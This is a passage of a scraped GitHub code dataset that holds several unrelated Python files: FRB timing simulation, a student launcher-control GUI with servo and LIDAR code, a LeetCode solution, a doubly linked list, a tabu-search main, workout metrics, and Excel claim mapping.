+ np.sum(np.sin(k * phase) * norm) ** 2\n )\n return np.sum(stat)\n\n\n@jit(nopython=True)\ndef simulate(simulations: int, differences: np.ndarray, minimum: int, maximum: int):\n \"\"\"\n Generate simulated observations.\n\n Parameters\n ----------\n simulations : int\n [description]\n differences : np.ndarray\n [description]\n minimum : int\n [description]\n maximum : int\n [description]\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n differences_mc = np.zeros((int(simulations), len(differences)))\n toas_mc = np.zeros((int(simulations), len(differences) + 1))\n errors_mc = np.zeros((int(simulations), len(differences) + 1))\n\n for index in np.arange(0, int(simulations), 1):\n differences_mc[index] = np.random.uniform(minimum, maximum, len(differences))\n\n for index in np.arange(0, len(differences_mc), 1):\n toas_mc[index, 1:] = np.cumsum(differences_mc[index, :])\n\n return differences_mc, toas_mc, errors_mc\n\n\ndef save(data: np.ndarray, savepath: Path) -> None:\n \"\"\"\n Save np.ndarray.\n\n Parameters\n ----------\n data : np.ndarray\n savepath : Path\n \"\"\"\n filename = savepath.absolute().as_posix()\n np.savez(filename, max_z12_power=data)\n savepath.chmod(0o100666)\n\n\ndef execute(\n arrivals: List[float],\n chi: float,\n simulations: int,\n savepath: Path,\n debug: bool = False,\n) -> None:\n \"\"\"\n Run the simulation .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int\n [description]\n savepath: str\n [description]\n \"\"\"\n if debug:\n log.setLevel(logging.DEBUG)\n log.debug(\"Job Recieved: ✔️\")\n np.random.seed(random.SystemRandom().randint(0, 2147483647))\n log.debug(\"Random Seed : ✔️\")\n grid = frequency_grid()\n log.debug(\"Frequency Grid: ✔️\")\n toas, errors, differences, minimum, maximum = parameters(\n arrivals=arrivals,\n chi=chi,\n simulations=simulations,\n )\n log.debug(\"Parameters: ✔️\")\n differences_mc, toas_mc, errors_mc = simulate(\n simulations, differences, minimum, maximum\n )\n log.debug(\"Dataset: ✔️\")\n max_z12_power = np.zeros(len(toas_mc))\n\n for index in tqdm(\n np.arange(0, len(toas_mc), 1),\n ascii=True,\n desc=\"simulating\",\n leave=True,\n ):\n toa = toas_mc[index]\n error = errors_mc[index]\n z1 = z2search(toa, error, grid)\n max_index = np.argmax(z1)\n max_period = 1.0 / grid[max_index] # noqa: F841\n max_z12_power[index] = z1[max_index]\n log.debug(\"Simulations: ✔️\")\n save(max_z12_power, savepath)\n log.debug(\"Save: ✔️\")\n","repo_name":"CHIMEFRB/subpulse","sub_path":"subpulse/analysis/toa.py","file_name":"toa.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5419705174","text":"# This is version 2 of the Control GUI for my Capstone project.\r\n# It includes a safety system for the fire control, an elevation indicator,\r\n# and the potential for linking to another camera to read the pressure gage.\r\n\r\n# OPERATIONAL NOTES:\r\n# The fire button only enables when all three checkboxes are checked, providing a triple-redundant safety.\r\n# The cinch button only enables after the fire button has been pressed.\r\n# The drag deploy button only enables after the cinch button has been pressed.\r\n\r\n# SPECIAL NOTE: If the fire, cinch, or drag buttons break, add a global definition directly above its first use inside a function.\r\n\r\nfrom __future__ import division # servo\r\nimport Tkinter as tk # GUI\r\nimport cv2 # Pressure Gage\r\nfrom PIL import Image, ImageTk # Pressure Gage\r\nimport time # servo and LIDAR\r\nimport math # servo\r\nimport Adafruit_PCA9685 # servo\r\nimport smbus # LIDAR\r\n\r\n# Some LIDAR initializers\r\nbus=smbus.SMBus(1)\r\naddr=0x62\r\n\r\n##import tkMessageBox as mb # This is just so that there is a dialog box that pops up to confirm the fire.\r\n\r\nroot = tk.Tk() # initialize the window.\r\nroot.geometry('590x420') # Sets the default window size\r\nroot.title(\"Control GUI\")\r\n\r\n# ****************************************************************************\r\n# This section contains the elevation indicator.\r\nelevationLabel = tk.Label(root, text = \"Elevation (deg):\", font = 20)\r\nelevationValue = tk.DoubleVar() # this holds the actual elevation value\r\neleValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the elevation.\r\n\r\ndef getElevation(elevation): # a function for changing the elevation value.\r\n elevationValue.set(elevation)\r\n\r\ndef updateEle(root, *args): # called when the elevation value is changed.\r\n eleValOut.config(text = elevationValue.get())\r\n\r\nelevationValue.trace(\"w\", updateEle)\r\n\r\nelevationLabel.grid(row=0, column=0)\r\neleValOut.grid(row=0, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the rotation indicator.\r\nrotationLabel = tk.Label(root, text = \"Rotation (deg):\", font = 20)\r\nrotationValue = tk.DoubleVar() # this holds the actual rotation value\r\nrotValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the rotation.\r\n\r\ndef getRotation(rotation): # a function for changing the rotation value.\r\n rotationValue.set(rotation)\r\n\r\ndef updateRot(root, *args): # called when the rotation value is changed.\r\n rotValOut.config(text = rotationValue.get())\r\n\r\nrotationValue.trace(\"w\", updateRot)\r\n\r\nrotationLabel.grid(row=1, column=0)\r\nrotValOut.grid(row=1, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the range indicator.\r\nrangeLabel = tk.Label(root, text = \"Distance to Target:\", font = 20)\r\nrangeValue = tk.DoubleVar() # this holds the actual range value\r\nranValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the range.\r\n\r\ndef getRange(dist): # a function for changing the range value.\r\n rangeValue.set(dist)\r\n\r\ndef updateRan(root, *args): # called when the range value is changed.\r\n ranValOut.config(text = rangeValue.get())\r\n\r\ndef rangeFind(): # This section is the LIDAR code\r\n t_end = time.time() + 5\r\n while time.time() < t_end:\r\n bus.write_byte_data(0x62,0x00, 0x04) \r\n val_high=bus.read_byte_data(0x62,0x0f) \r\n val_low=bus.read_byte_data(0x62,0x10) \r\n dist_cm=val_high*256+val_low\r\n dist_ft=dist_cm*0.0328084\r\n getRange(dist_ft)\r\n #print `dist_ft` + \" ft \"\r\n time.sleep(0.05)\r\n\r\nrangeValue.trace(\"w\", updateRan)\r\n\r\nuRanButton = tk.Button(root, text='Update Range', command=rangeFind)\r\n\r\nrangeLabel.grid(row=2, column=0)\r\nranValOut.grid(row=2, column=1)\r\nuRanButton.grid(row=2, column=2)\r\n\r\n# ****************************************************************************\r\n# This section contains the video for reading the pressure gage. It is purely optional.\r\n##picW = 320\r\n##picH = 214\r\n##ImageFrame=tk.Frame(root,width=picW,height=picH)\r\n##lmain=tk.Label(ImageFrame)\r\n##gageLabel = tk.Label(root, text = \"Pressure Gage:\", font = 20)\r\n##\r\n##cap=cv2.VideoCapture(0) # sets the camera\r\n##\r\n##def getVideo():\r\n## _,frame = cap.read()\r\n## hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n## hsv = cv2.resize(hsv, (picW, picH), interpolation=cv2.INTER_AREA)\r\n## img=Image.fromarray(hsv)\r\n## imgtk=ImageTk.PhotoImage(image=img)\r\n## lmain.imgtk=imgtk\r\n## lmain.configure(image=imgtk)\r\n## lmain.after(10,getVideo)\r\n## \r\n##getVideo() # This actually uses the camera to capture images. You may delete it.\r\n##gageLabel.grid(row=3, column=0)\r\n##ImageFrame.grid(row=3, column=1) # keep these locations the same.\r\n##lmain.grid(row=3, column=1) # keep these locations the same.\r\n\r\n# ****************************************************************************\r\n# This section contains the fire control and safety system.\r\n# these are the variables controlled by the checkboxes.\r\nflag1 = tk.BooleanVar()\r\nflag2 = tk.BooleanVar()\r\nflag3 = tk.BooleanVar()\r\nfireState = tk.BooleanVar(value=False)\r\n\r\ndef fire():\r\n # Insert whatever code we want here. It could just be a print statement.\r\n #mb.showinfo('FIRE', 'BOOM')\r\n print(\"BOOM\")\r\n fireState.set(True)\r\n\r\nfireButton = tk.Button(root, state=tk.DISABLED, text='Fire', command=fire) # sets the fire button to disabled by default.\r\n \r\ndef safetySys(root, *args): # The parameters of this function are automatically generated by the trace call.\r\n if all([flag1.get(), flag2.get(), flag3.get()]): # If all 3 checkboxes are checked, enable the fire button.\r\n fireButton.config(state=tk.NORMAL)\r\n else: # If not, disable the fire button for safety.\r\n fireButton.config(state=tk.DISABLED)\r\n\r\n# The locations of the safety boxes and fire button \r\ntk.Checkbutton(root, variable=flag1).grid(row=4, column=0)\r\ntk.Checkbutton(root, variable=flag2).grid(row=4, column=1)\r\ntk.Checkbutton(root, variable=flag3).grid(row=4, column=2)\r\nfireButton.grid(row=5, column=1)\r\n\r\n# These lines watch for a change in the variables controlled by the checkboxes.\r\nflag1.trace(\"w\", safetySys)\r\nflag2.trace(\"w\", safetySys)\r\nflag3.trace(\"w\", safetySys)\r\n\r\n# ****************************************************************************\r\n# This section contains the cinch control\r\ncinchState = tk.BooleanVar(value=False)\r\ndef cinch():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('CINCH', 'WHIRRRRRRRR')\r\n print(\"WHIRRRRRRRRR\")\r\n fireState.set(False)\r\n cinchState.set(True)\r\n\r\ncinchButton = tk.Button(root, state=tk.DISABLED, text='Cinch', command=cinch) # sets the cinch button to disabled by default\r\n\r\ndef enableCinch(root, *args): # if the fire button has been pressed, enable the cinch button.\r\n if fireState.get():\r\n cinchButton.config(state=tk.NORMAL) # enables the cinch button.\r\n else:\r\n cinchButton.config(state=tk.DISABLED)\r\n\r\nfireState.trace(\"w\", enableCinch) # when the fireState variable changes, check if you should enable the cinch button.\r\n\r\ncinchButton.grid(row=6, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the drag device control\r\ndef dragDeploy():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('Deploy Confirm', 'Junk Deorbiting')\r\n print(\"Junk Deorbiting\")\r\n\r\ndragButton = tk.Button(root, state=tk.DISABLED, text='Drag Device', command=dragDeploy) # sets the drag button to disabled by default\r\n\r\ndef enableDrag(root, *args): # if the cinch button has been pressed, enable the drag device button\r\n dragButton.config(state=tk.NORMAL) # enables the drag button.\r\n\r\ncinchState.trace(\"w\", enableDrag) # when the cinchState variable changes, check if you should enable the drag button.\r\n\r\ndragButton.grid(row=7, column=1)\r\n\r\n# ****************************************************************************\r\n### debug window. Manually change elevation and rotation.\r\n##dew = tk.Toplevel() # define an entirely seperate window for the entries\r\n##dew.geometry('320x75')\r\n##dew.title(\"Debug Window\")\r\n##deELab = tk.Label(dew, text = \"Enter Elevation:\", font = 20) # the labels\r\n##deRLab = tk.Label(dew, text = \"Enter Rotation:\", font = 20)\r\n##deRgLab = tk.Label(dew, text = \"Enter Range:\", font = 20)\r\n##\r\n##elevationEntry = tk.Entry(dew) # the entry fields\r\n##rotationEntry = tk.Entry(dew)\r\n##rangeEntry = tk.Entry(dew)\r\n##\r\n##def passEle(event):\r\n## getElevation(elevationEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##def passRot(event):\r\n## getRotation(rotationEntry.get()) # get the value in the field and pass it to the get function.\r\n## \r\n##def passRan(event):\r\n## getRange(rangeEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##elevationEntry.bind(\"\", passEle) # get the number in the entry field when enter is pressed.\r\n##rotationEntry.bind(\"\", passRot) # get the number in the entry field when enter is pressed.\r\n##rangeEntry.bind(\"\", passRan)\r\n##\r\n##deELab.grid(row=0, column=0)\r\n##elevationEntry.grid(row=0, column=1)\r\n##deRLab.grid(row=1, column=0)\r\n##rotationEntry.grid(row=1, column=1)\r\n##deRgLab.grid(row=2, column=0)\r\n##rangeEntry.grid(row=2, column=1)\r\n\r\n# ****************************************************************************\r\n# This section is for the motor motion.\r\npwm = Adafruit_PCA9685.PCA9685()\r\n\r\nminMotionX = 380 # The maximum servo motion left and right (pan)\r\nminMotionY = 150\r\nmaxMotionX = 470 # The maximum servo motion left and right (pan)\r\nmaxMotionY = 670 # The maximum servo motion up and down (tilt)\r\nmoveDis = 1 # Tells the key presses how far to move each time\r\n\r\ntiltSet = 530 # Sets start and end position of motor\r\npanSet = 413 # Sets start and end position of motor # 410\r\n\r\ncurX = panSet # Holds the current x position\r\ncurY = tiltSet # Holds the current y position # 400\r\n\r\npwm.set_pwm_freq(60) # Set frequency to 60hz, good for servos.\r\npwm.set_pwm(14, 14, panSet) # Set X starting position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y starting position # 387\r\nprint('Initializing servos on channel 0 and 1, \"X\" GUI window to quit...')\r\nprint('If cv2 color doesnt run: close the program, give it 5 seconds, then try again')\r\n\r\n# ------------------------------\r\n# Servo functions\r\ndef updatePos():\r\n \r\n pwm.set_pwm(15, 15, curY)\r\n\r\n # These Lines Translate curX,curY into reference (X,Y) coordinates for user\r\n coordX = curX-panSet\r\n coordY = -(curY-tiltSet) # Sign is flipped because Torxis motors read PWM backwards from mini servos\r\n## print(coordX,coordY) # Print current X,Y servo positions\r\n # These Lines output an angle from linear fit calibration based on known angles and PWM signals (coordY) \r\n pitchAngle = -.000003*coordY*coordY*coordY + .0016*coordY*coordY + .2399*coordY + .1111\r\n panAngle = .000002*coordX*coordX*coordX*coordX + .0001*coordX*coordX*coordX - .0041*coordX*coordX + 1.1562*coordX - 1.6779\r\n getElevation(pitchAngle)\r\n getRotation(panAngle)\r\n## print(panAngle,'Pan Degrees') # Diplays servo pan angle from zero\r\n## print(pitchAngle,'Tilt Degrees') # Displays servo pitch angle from local horizontal\r\n## print(' ') # To indent different displayed values per servo position\r\n \r\n pwm.set_pwm(14, 14, curX)\r\n return\r\n\r\ndef keyMotionUp(event):\r\n #print(\"Key Down\")\r\n global curY\r\n moveDis = 1\r\n curY -= moveDis\r\n if curY > maxMotionY: # The \"-21\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n curY = maxMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionDown(event):\r\n #print(\"Key Up\")\r\n global curY\r\n moveDis = 1\r\n curY += moveDis\r\n if curY < minMotionY:\r\n curY = minMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionLeft(event):\r\n #print(\"Key Left\")\r\n global curX\r\n moveDis = 1\r\n curX -= moveDis\r\n if curX < minMotionX:\r\n curX = minMotionX\r\n updatePos()\r\n return\r\n\r\ndef keyMotionRight(event):\r\n #print(\"Key Right\")\r\n global curX\r\n moveDis = 1\r\n curX += moveDis\r\n if curX > maxMotionX - 12: # The \"-12\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n curX = maxMotionX - 12\r\n updatePos()\r\n return\r\n# ---------------Fast Key Options-----------------\r\ndef keyMotionFastUp(event):\r\n #print(\"Key Down\")\r\n global curY\r\n moveDis = 5\r\n curY -= moveDis\r\n if curY > maxMotionY - 21:\r\n curY = maxMotionY - 21\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastDown(event):\r\n #print(\"Key Up\")\r\n global curY\r\n moveDis = 5\r\n curY += moveDis\r\n if curY < minMotionY:\r\n curY = minMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastLeft(event):\r\n #print(\"Key Left\")\r\n global curX\r\n moveDis = 5\r\n curX -= moveDis\r\n if curX < minMotionX:\r\n curX = minMotionX\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastRight(event):\r\n #print(\"Key Right\")\r\n global curX\r\n moveDis = 5\r\n curX += moveDis\r\n if curX > maxMotionX - 12: \r\n curX = maxMotionX - 12\r\n updatePos()\r\n return\r\n#------------------------------------\r\n\r\n# End of servo functions\r\n# -------------------------------------------\r\n# The other bits: a bind and the prints.\r\nroot.bind('', keyMotionUp) # These functions detect a directional keypress,\r\nroot.bind('', keyMotionDown) # then call the function that is the second argument.\r\nroot.bind('', keyMotionLeft)\r\nroot.bind('', keyMotionRight)\r\nroot.bind('',keyMotionFastUp)\r\nroot.bind('',keyMotionFastDown)\r\nroot.bind('',keyMotionFastLeft)\r\nroot.bind('',keyMotionFastRight)\r\n\r\n# ****************************************************************************\r\nroot.mainloop() # Displays the GUI until the close button is pressed.\r\n#cap.release() # shuts down the camera when the program is closed.\r\n\r\npwm.set_pwm(14, 14, panSet) # Set X ending position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y ending position\r\n","repo_name":"armaged835/Motion-Tracker-and-Launcher","sub_path":"Control GUI V3.py","file_name":"Control GUI V3.py","file_ext":"py","file_size_in_byte":14111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42657044129","text":"class Solution(object):\n def maxEnvelopes(self, envelopes):\n \"\"\"\n :type envelopes: List[List[int]]\n :rtype: int\n \"\"\"\n if len(envelopes) == 0:\n return 0\n dp = []\n envelopes.sort(key=lambda x: (x[0], -x[1]))\n for i in range(len(envelopes)):\n l, r = 0, len(dp)\n while l < r:\n mid = (l + r) / 2\n if dp[mid] < envelopes[i][1]:\n l = mid + 1\n else:\n r = mid\n if r >= len(dp):\n dp.append(envelopes[i][1])\n else:\n dp[r] = envelopes[i][1]\n return len(dp)","repo_name":"maruichen2004/LeetCode","sub_path":"Russian_Doll_Envelopes.py","file_name":"Russian_Doll_Envelopes.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71111665052","text":"import pathlib\nimport os\n\nfrom constructive.constructive_heuristic import assign_districts\nfrom utilities import read_instance, distance_matrix, MapVisualiser\nfrom solution import Solution\nfrom taboo_search.search_manager import run_search\n\nif __name__ == \"__main__\":\n relative_path = pathlib.Path(__file__).parent.absolute()\n clients = read_instance(os.path.join(relative_path, 'instances', 'instance_small.txt'))\n distance_matrix = distance_matrix(clients)\n K = 6\n g = 150\n b = 3\n rnd_seed = 0\n \n districts = assign_districts(clients, K, distance_matrix, g, b, rnd_seed) \n for district in districts:\n district.best_ever_average_distance = district.value\n \n print(\"solucion constructivo %s\" %(districts[-1].value - districts[0].value))\n iterClientes = 5\n iterSwap = 25\n districts, best_OF_ever = run_search(districts,distance_matrix, 50, iterClientes, iterSwap)\n districts.sort(key=lambda di: di.value)\n solution = Solution(districts)\n mp_v = MapVisualiser()\n mp_v.draw_cluster(solution)\n print(\"solucion TS clientes %s, swap %s, FO %s\" %(iterClientes, iterSwap, solution.OF))","repo_name":"camilovelez/claseMetaheuristica","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25226301518","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.next = None\n self.prev = None\n \n \nclass DoublyLinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n \n \n def print_DLL(self):\n temp = self.head\n while(temp):\n print(temp.value)\n temp = temp.next\n \n \n def append(self, *value):\n for value in value:\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n self.length += 1\n return True\n new_node.prev = self.tail\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n return True\n \n \n def pop(self):\n if self.length == 0:\n return None\n temp = self.tail\n if self.length == 1:\n self.head = None\n self.tail = None\n self.length -=1\n return temp.value\n self.tail.prev.next = None\n self.tail.prev = None\n self.tail = temp\n self.length -= 1\n return temp.value\n \n \n def prepend(self,value):\n if self.length == 0:\n return self.append(value)\n new_node = Node(value)\n new_node.next = self.head\n self.head.prev = new_node\n self.head = new_node\n self.length += 1\n return True\n \n def popfirst(self):\n if self.length <= 1:\n return self.pop()\n temp = self.head\n self.head = temp.next\n self.head.prev = None\n temp.next = None \n self.length -= 1\n return temp\n \n \n def get(self, index):\n if index <0 or index >= self.length:\n return None\n if index < self.length/2:\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n temp = self.tail\n for _ in range(self.length-1, index, -1):\n temp = temp.prev\n return temp\n\n \n def set(self, index, value):\n temp = self.get(index)\n if (temp):\n temp.value = value\n return True\n else:\n return False\n \n def insert(self, index, value):\n if index < 0 or index > self.length:\n return False\n elif index == 0:\n return self.prepend(value)\n elif index == self.length:\n return self.append(value)\n else:\n new_node = Node(value)\n temp = self.get(index - 1)\n new_node.next = temp.next\n new_node.prev = temp \n temp.next.prev = new_node\n temp.next = new_node\n self.length += 1\n return True\n \n def remove(self, index):\n if index < 0 or index >= self.length:\n return None\n if index == 0:\n return self.popfirst()\n if index == self.length-1:\n return self.pop()\n if self.length == 1:\n return self.pop()\n temp = self.get(index)\n temp.prev.next = temp.next\n temp.next.prev = temp.prev \n temp.next = None\n temp.prev = None\n self.length -= 1\n return temp\n \nx = DoublyLinkedList(1)\n#x.append(2,3,4,5,6,7,8,9)\n#x.prepend(0)\n\n#x.print_DLL()\nx.insert(7,100)\nprint(\"#########################\")\nx.remove(0)\n#print(x.get(7).value)\n\nprint(\"#########################\")\nprint(\"head = {}, tail = {}, length = {}\".format(x.head.value if x.head else x.head, x.tail.value if x.tail else x.tail, x.length))\nx.print_DLL()","repo_name":"tk8320/DataStructures","sub_path":"DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33998821921","text":"from base45reflex.SQLModels import Exercise, User, UserProgramHistory, Workout, WorkoutSet, UserWorkoutMetrics\nimport pandas as pd\nfrom sqlmodel import Session, create_engine, select\nfrom rxconfig import ENVIRONMENT\n\n\ndef calculate_metrics(user: User, session: Session):\n program_history_statement = UserProgramHistory.select.filter(UserProgramHistory.user_id == user.id)\n program_history = session.scalars(program_history_statement).all()\n for program in program_history:\n workout_statement = (Workout.select.filter(Workout.user_id == user.id)\n .filter(Workout.date <= program.end_date)\n .filter(Workout.date >= program.start_date))\n workout_list = session.scalars(workout_statement).all()\n if not workout_list:\n continue\n for workout in workout_list:\n set_statement = select(WorkoutSet, Exercise).join(Exercise).where(WorkoutSet.workout_id == workout.id)\n set_list = sess.exec(set_statement).all()\n for ex_set in set_list:\n temp_set = ex_set[0]\n exercise = ex_set[1]\n load_value = temp_set.weight * temp_set.num_sets\n load = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='TotalLoad', date=workout.date,\n exercise=exercise.name, value=load_value, unit_id=temp_set.unit_id)\n avg_rpe = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, value=temp_set.avg_rpe,\n date=workout.date, exercise=exercise.name, metric='AvgRPE')\n avg_reps = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='AvgRepsPerSet',\n date=workout.date, exercise=exercise.name,\n value=temp_set.reps/temp_set.num_sets)\n sess.add(load)\n sess.add(avg_rpe)\n sess.add(avg_reps)\n sess.commit()\n\n\nif __name__ == \"__main__\":\n if ENVIRONMENT == \"DEV\":\n db_url = \"sqlite:///reflex_dev.db\"\n else:\n db_url = \"sqlite:///reflex.db\"\n\n engine = create_engine(db_url)\n\n with Session(engine) as sess:\n user_list = sess.scalars(User.select.filter()).all()\n\n for user in user_list:\n calculate_metrics(user, sess)\n","repo_name":"raven-black-dream/base45reflex","sub_path":"calculate_metrics.py","file_name":"calculate_metrics.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7718342456","text":"#!/usr/bin/python\n# FINAL SCRIPT updated as of 8th April 2020\n# Workflow - CBA/MEDICLINIC\n# Version 1\n\n# Declare Python libraries needed for this script\nimport pandas as pd\nimport numpy as np\nfrom xlrd import open_workbook\nimport xlrd\nimport os\nimport math\n\ndef populate_data_medi(disbursementClaim, bordlisting, disbursementMaster, destination, medi_base):\n\n try:\n DCM_df, BordListing_df, DC_df = medi_mapping(disbursementMaster, bordlisting, disbursementClaim)\n DCM_df.to_excel(destination + 'disbursement master(new).xlsx', index = False)\n BordListing_df.to_excel(destination + \"Bord Listing(new).xlsx\", index = False, header = False)\n DC_df.to_excel(destination + \"Disbursement Claim(new).xlsx\", index = False, header = False)\n except Exception as error:\n print('ERROR')\n\ndef medi_mapping(disbursementMaster, bordereauxListing, disbursementClaim):\n \n wb = xlrd.open_workbook(bordereauxListing)\n bordlist_df = pd.read_excel(wb)\n\n dcm_workbook = open_workbook(disbursementMaster)\n dcm_sheet = dcm_workbook.sheet_by_index(0)\n df = pd.read_excel(dcm_workbook)\n \n if df.columns[0] != 'Date':\n dcm_df = pd.read_excel(disbursementMaster, sheet_by_index = 0, skiprows = 2, usecols = list(range(dcm_sheet.ncols + 1)))\n else:\n dcm_df = pd.read_excel(disbursementMaster, sheet_by_index = 0, skiprows = 0, usecols = list(range(dcm_sheet.ncols + 1)))\n\n newRunnningNo = dcm_df.iloc[get_DCM_fill_index(disbursementMaster), 1]\n newRowIndex = get_DCM_fill_index(disbursementMaster)\n\n # Perform update data into new row in Disbursement Claim Master file\n print(\"- Perform update data into new row in Disbursement Claim Master file.\")\n \n data2 = pd.read_excel(bordereauxListing, skiprows = 11)\n totalCases = get_number_cases_price(bordereauxListing)\n price = data2.loc[get_number_cases_price(bordereauxListing), 'Aetna Amount']\n initial = data2.loc[get_Initial_index(bordereauxListing), 'Aetna Amount']\n ##Mapping\n bordlist_df.iloc[5,2] = newRunnningNo\n dcm_df.loc[newRowIndex, 'Date'] = bordlist_df.iloc[3, 2]\n dcm_df.loc[newRowIndex, 'Bord No'] = bordlist_df.iloc[2, 2]\n dcm_df.loc[newRowIndex, 'Corporate'] = bordlist_df.iloc[0, 2]\n dcm_df.loc[newRowIndex, 'Amount (RM) \\n(Kindly put (RM0.00) for CN)'] = price\n dcm_df.loc[newRowIndex, 'Initial'] = initial\n dcm_df.loc[newRowIndex, 'Total no of cases bord'] = totalCases\n\n ###Populate Disbursement Claim\n wb = xlrd.open_workbook(disbursementClaim)\n dc_df = pd.read_excel(wb)\n\n dc_df.iloc[18, 3] = newRunnningNo\n dc_df.iloc[18, 8] = dcm_df.loc[newRowIndex, 'Date']\n dc_df.iloc[28, 3] = dcm_df.loc[newRowIndex, 'Bord No']\n dc_df.iloc[28, 0] = dcm_df.loc[newRowIndex, 'Corporate']\n dc_df.iloc[28, 7] = price\n dc_df.iloc[54, 6] = initial\n\n\n return dcm_df, bordlist_df, dc_df\n \ndef get_DCM_fill_index(disbursementMaster):\n dcm_workbook = open_workbook(disbursementMaster)\n dcm_sheet = dcm_workbook.sheet_by_index(0)\n df = pd.read_excel(dcm_workbook)\n if df.columns[0] != 'Date':\n data=pd.read_excel(disbursementMaster, skiprows = 2 , na_values = \"Missing\")\n else:\n data=pd.read_excel(disbursementMaster, skiprows = 0 , na_values = \"Missing\")\n\n Bord_No_list = pd.DataFrame(data, columns=['Bord No']).values.tolist()\n counter=len(Bord_No_list)-1\n try:\n while True:\n math.isnan(Bord_No_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_number_cases_price(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = \"Missing\")\n Diagnosis_Description_list = pd.DataFrame(data, columns=['Diagnosis Description [Code]']).values.tolist()\n counter=len(Diagnosis_Description_list)-1\n try:\n while True:\n math.isnan(Diagnosis_Description_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_Initial_index(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = \"Missing\")\n Anetna_Amount_Column_list = pd.DataFrame(data, columns=['Aetna Amount']).values.tolist()\n counter=len(Anetna_Amount_Column_list)-1\n try:\n while True:\n math.isnan(Anetna_Amount_Column_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter-1\n return fill_index\n\n","repo_name":"WendellTeam/AICoreEngine","sub_path":"AIEngine/transformation/populate_data_medi.py","file_name":"populate_data_medi.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3424521328","text":"# Digitar indefinidos valores e parar se o usuário digitar 999.\n# mostrar a soma e quantos valores foram digitados\nc = s = 0 # contador\nwhile True:\n n = int(input('\\033[31mDigite um valor (999 para parar): \\033[m'))\n if n == 999: # se colocar o break no final ele lê 999 adiciona 1 no contador e 999 na soma\n break\n c += 1\n s += n\nprint(f'\\033[1;32mA soma dos {c} valores é {s}\\033[m')","repo_name":"borgesgfj/python_basic_exercises","sub_path":"exerc66.py","file_name":"exerc66.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8555900856","text":"# import functions from data.py\nfrom data.data import *\n\n\n# Display Menu function\ndef displayMenu():\n print()\n # Display main menu\n print(\"\"\"=============================\nVehicle Traffic at Border 1 \n================================================================================================================================================\n 1.Display the number of vehicle crossings by city in 2012.\n 2.Mean of vehicle-crossings from 2010 to 2015 and years and the number of vehicle crossings in that period which fall below the mean found.\n 3.Vehicle crossings increased by at least 6% over the previous year.\n 4.Display Chart\n 5.Exit/Quit\n================================================================================================================================================\n \"\"\")\n\n\n# Main Function\ndef Main():\n readData()\n inputOp = True\n while inputOp:\n displayMenu()\n\n # Get Menu Input\n inputOp = input(\"Choose your menu : \")\n print()\n # Menu 1\n if inputOp == '1':\n option1()\n # Menu 2\n elif inputOp == '2':\n city = input(\"Enter city name : \")\n option2(city)\n # Menu 3\n elif inputOp == '3':\n city = input(\"Enter city name : \")\n option3(city)\n # Menu 4\n elif inputOp == '4':\n option4()\n # Menu 5\n elif inputOp == '5':\n quest = input(\"Are you sure ? (Y/N) : \")\n if quest == \"Y\":\n exit()\n # If nothing matches continue the loop\n else:\n continue\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"Abhijith14/PythonProjects","sub_path":"Project 1 - Vehicle Traffic 